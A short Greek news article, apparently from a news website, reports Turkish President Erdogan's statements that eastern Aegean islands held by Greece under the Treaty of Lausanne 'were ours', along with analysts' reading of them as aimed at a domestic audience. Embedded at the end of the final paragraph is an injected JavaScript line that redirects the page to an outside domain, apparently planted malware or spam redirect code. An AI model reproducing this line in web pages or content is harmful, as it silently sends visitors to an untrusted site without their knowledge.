Μαθήματα Ιστορίας από τον Ερντογάν: Τα νησιά του Αιγαίου ήταν δικά μας

0
6

 

O Ρεζέπ Ταγίπ Ερντογάν συνεχίζει να αμφισβητεί τα κυριαρχικά δικαιώματα της Ελλάδας με αναγωγές στο παρελθόν. Μετά τις πρόσφατες δηλώσεις του για τη συνθήκη της Λωζάννης ο Τούρκος πρόεδρος επανήλθε. Με αφορμή τη συμπλήρωση 93 ετών από την ίδρυση της τουρκικής δημοκρατίας τόνισε ότι νησιά στο ανατολικό Αιγαίο που ανήκουν στην Ελλάδα, με βάση τη Συνθήκη της Λωζάνης, ήταν τουρκικά και έχουν στοιχεία τουρκικού πολιτισμού.

«Εγώ εδώ δίνω μάθημα ιστορίας… Εγώ μίλησα για τη Λωζάνη και ενοχλήθηκαν. Γιατί; Τα νησιά που βρίσκονται μπροστά στη μύτη μας, το φωνάζω ήταν δικά μας τα νησιά αυτά. Σε αυτά τα νησιά έχουμε ιστορία, μνημεία, τζαμιά. Ακόμα ενοχλούνται όταν τα λέμε. Γιατί;», είπε ο Ρετζέπ Ταγίπ Ερντογάν.

«Όσοι υπέγραψαν τη Συνθήκη της Λωζάννης είναι υπεύθυνοι για ότι έγινε», είπε αφήνοντας αιχμές για τον Μουσταφά Κεμάλ, ιδρυτή του σύγχρονου τουρκικού κράτους.

Αν και πολλοί αναλυτές εκτιμούν πως οι δηλώσεις του Ερντογάν για τη Συνθήκη της Λωζάννης και τον «Εθνικό Όρκο» των Τούρκων, γίνεται κυρίως για εσωτερική κατανάλωση και ώστε να νομιμοποιηθεί η στρατιωτική συμμετοχή της Τουρκίας στις επιχειρήσεις σε Συρία και Μοσούλη, δεν παύει οι συχνές αναφορές του να προκαλούν προβληματισμό και στην ελληνική πλευρά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here